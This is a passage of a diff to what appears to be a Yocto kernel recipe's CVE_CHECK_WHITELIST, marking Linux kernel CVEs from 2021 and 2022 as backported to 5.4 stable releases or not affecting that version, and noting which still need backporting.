+CVE_CHECK_WHITELIST += "CVE-2021-43976"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-44733"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2021-44879"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-45095"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45100"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45402"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-45469"
+
+# fixed-version: only affects 5.13rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45480"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-45485"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-45486"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-45868"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46283"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-46904"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46905"
+
+# cpe-stable-backport: Backported in 5.4.127
+CVE_CHECK_WHITELIST += "CVE-2021-46906"
+
+# CVE-2021-46908 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46909"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46910"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46911"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46912"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46913"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46914"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46915"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46916"
+
+# fixed-version: only affects 5.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46917"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46918"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46919"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46920"
+
+# cpe-stable-backport: Backported in 5.4.115
+CVE_CHECK_WHITELIST += "CVE-2021-46921"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46922"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46923"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46924"
+
+# CVE-2021-46925 needs backporting (fixed from 5.16rc8)
+
+# CVE-2021-46926 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46927"
+
+# CVE-2021-46928 needs backporting (fixed from 5.16rc7)
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46929"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46930"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46931"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46932"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46933"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46934"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46935"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46936"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46937"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46938"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46939"
+
+# fixed-version: only affects 5.10rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46940"
+
+# CVE-2021-46941 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46942"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46943"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46944"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46945"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46947"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46948"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46949"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46950"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46951"
+
+# CVE-2021-46952 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46953"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46954"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46955"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46956"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46957"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46958"
+
+# CVE-2021-46959 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46960"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46961"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46962"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46963"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46964"
+
+# CVE-2021-46965 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46966"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46967"
+
+# fixed-version: only affects 5.10rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46968"
+
+# CVE-2021-46969 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-46970 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46971"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46972"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46973"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46974"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46976"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46977"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46978"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46979"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46980"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46981"
+
+# CVE-2021-46982 needs backporting (fixed from 5.13rc2)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46983"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46984"
+
+# fixed-version: only affects 5.12rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46985"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46986"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46987"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46988"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46989"
+
+# fixed-version: only affects 5.10rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46990"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46991"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46992"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46993"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46994"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46995"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46996"
+
+# fixed-version: only affects 5.10rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46997"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46998"
+
+# fixed-version: only affects 5.7rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46999"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47000"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47001"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47002"
+
+# fixed-version: only affects 5.11 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47003"
+
+# CVE-2021-47004 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-47005 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-47006"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47007"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47009"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47010"
+
+# fixed-version: only affects 5.11rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47011"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47012"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47013"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47014"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47015"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47016"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47017"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47018"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47019"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47020"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47021"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47022"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47023"
+
+# CVE-2021-47024 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47025"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47026"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47027"
+
+# CVE-2021-47028 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47029"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47030"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47031"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47032"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47034"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47035"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47036"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47037"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47038"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47039"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47040"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47041"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47042"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47043"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47044"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47045"
+
+# CVE-2021-47046 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47047"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47048"
+
+# CVE-2021-47049 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47050"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47051"
+
+# CVE-2021-47052 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47053"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47054"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47055"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47056"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47057"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47058"
+
+# CVE-2021-47059 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47060"
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47061"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47062"
+
+# CVE-2021-47063 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47064"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47065"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47066"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47067"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47069"
+
+# CVE-2021-47070 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47071"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47072"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47073"
+
+# CVE-2021-47074 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47075 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47076 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47077 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47078"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47079"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47080"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47081"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-47082"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47083"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47086"
+
+# fixed-version: only affects 5.14rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47087"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47088"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47089"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47090"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47091"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47092"
+
+# fixed-version: only affects 5.9 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47093"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47094"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47095"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47096"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47097"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47098"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47099"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47100"
+
+# CVE-2021-47101 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47102"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2021-47103"
+
+# fixed-version: only affects 5.15 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47104"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47105"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47106"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47107"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47108"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47109"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47110"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47111"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47112"
+
+# CVE-2021-47113 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47114"
+
+# CVE-2021-47116 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47117"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47118"
+
+# CVE-2021-47119 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47120"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47121"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47122"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47123"
+
+# CVE-2021-47124 needs backporting (fixed from 5.13rc2)
+
+# CVE-2021-47125 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47126"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47127"
+
+# CVE-2021-47128 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47129"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47130"
+
+# CVE-2021-47131 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47132"
+
+# CVE-2021-47133 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47134"
+
+# CVE-2021-47135 needs backporting (fixed from 5.13rc5)
+
+# CVE-2021-47136 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47137"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47138"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47139"
+
+# CVE-2021-47140 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47141"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47142"
+
+# CVE-2021-47143 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47144"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47146"
+
+# CVE-2021-47147 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47148"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47149"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47150"
+
+# CVE-2021-47151 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47152"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47153"
+
+# CVE-2021-47158 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47159"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47160"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47161"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47162"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47163"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47164"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47165"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47166"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47167"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47168"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47169"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47170"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47171"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47172"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47173"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47174"
+
+# CVE-2021-47175 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47176"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47177"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47178"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47179"
+
+# cpe-stable-backport: Backported in 5.4.123
+CVE_CHECK_WHITELIST += "CVE-2021-47180"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0001"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0002"
+
+# CVE-2022-0168 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0171"
+
+# cpe-stable-backport: Backported in 5.4.173
+CVE_CHECK_WHITELIST += "CVE-2022-0185"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0264"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0286"
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2022-0322"
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-0330"
+
+# CVE-2022-0382 needs backporting (fixed from 5.16)
+
+# CVE-2022-0400 has no known resolution
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0433"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0435"
+
+# CVE-2022-0480 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0487"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-0492"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-0494"
+
+# fixed-version: only affects 5.10rc1 onwards
